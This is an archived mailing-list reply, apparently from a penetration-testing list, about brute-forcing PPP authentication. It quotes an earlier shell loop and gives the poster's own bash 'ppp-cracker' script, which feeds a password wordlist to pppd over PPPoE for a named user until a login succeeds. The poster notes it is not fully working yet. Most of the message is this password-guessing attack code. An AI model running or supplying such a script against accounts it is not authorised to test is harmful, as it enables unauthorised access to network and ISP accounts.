RE: PPP authentication brute-force attack?

From: Matheus Michels (matheusf_michels@hotmail.com)
Date: Tue Feb 12 2008 - 22:06:50 EST

• Next message: Bartos-Elekes Zsolt: "Re: PPP authentication brute-force attack?"
• Previous message: Pen Testing: "Optimizing time in a pen-test"
• Maybe in reply to: Matheus Michels: "PPP authentication brute-force attack?"
• Next in thread: Bartos-Elekes Zsolt: "Re: PPP authentication brute-force attack?"
• Reply: Bartos-Elekes Zsolt: "Re: PPP authentication brute-force attack?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

> What about something like that (didn't try it):
>
> while read passwd; do
> pppd call pppd-options password "$passwd"
> if [ $? -eq 0 ]; then
> echo "Found password: $passwd"
> break
> fi
> done < /path/to/password-file
>
> where "pppd-options" is a file containing pppd's options, and
> "password-file" contains the passwords, one per line.
>
> You probably need the following options in "pppd-options":
>
> nodetach
> maxconnect 5
>

This is exactly what I wanted. I made this little script based on yours:

#!/bin/bash

SETSID=/usr/bin/setsid
PPPD=/usr/sbin/pppd
PPPOE=/usr/sbin/pppoe

PPPD_OPTIONS="noipdefault noauth default-asyncmap defaultroute hide-password nodetach usepeerdns mtu 1492 mru 1492 noaccomp noccp nobsdcomp nodeflate nopcomp novj novjccomp lcp-echo-interval 30 lcp-echo-failure 3 pap-max-authreq 2 pap-restart 3 maxconnect 5"
PPPOE_OPTIONS="-I eth0"

PASSWORDS=/home/matheus/pass.txt

if test "$1" = "" ; then
    echo "$0: Usage: ppp-cracker user">& 2
    exit 1
fi

while read passwd; do
   $SETSID $PPPD pty "$PPPOE $PPPOE_OPTIONS" $PPPD_OPTIONS user "$1" password "$passwd"
      if [ $? -eq 0 ]; then
           echo "Found password: $passwd"
           break
      fi
done < $PASSWORDS

I've copied some parts from the adsl-start and adsl-connect scripts. Actually, the script is not functional yet. It authenticates and, some seconds later, exits with an input/output error. But I'm doing some changes based on the scripts shipped with RP-PPPOE and I'm almost getting the script to work.

Thank you very much!

_________________________________________________________________
Helping your favorite cause is as easy as instant messaging. You IM, we give.
http://im.live.com/Messenger/IM/Home/?source=text_hotmail_join
------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

• Next message: Bartos-Elekes Zsolt: "Re: PPP authentication brute-force attack?"
• Previous message: Pen Testing: "Optimizing time in a pen-test"
• Maybe in reply to: Matheus Michels: "PPP authentication brute-force attack?"
• Next in thread: Bartos-Elekes Zsolt: "Re: PPP authentication brute-force attack?"
• Reply: Bartos-Elekes Zsolt: "Re: PPP authentication brute-force attack?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:24 EDT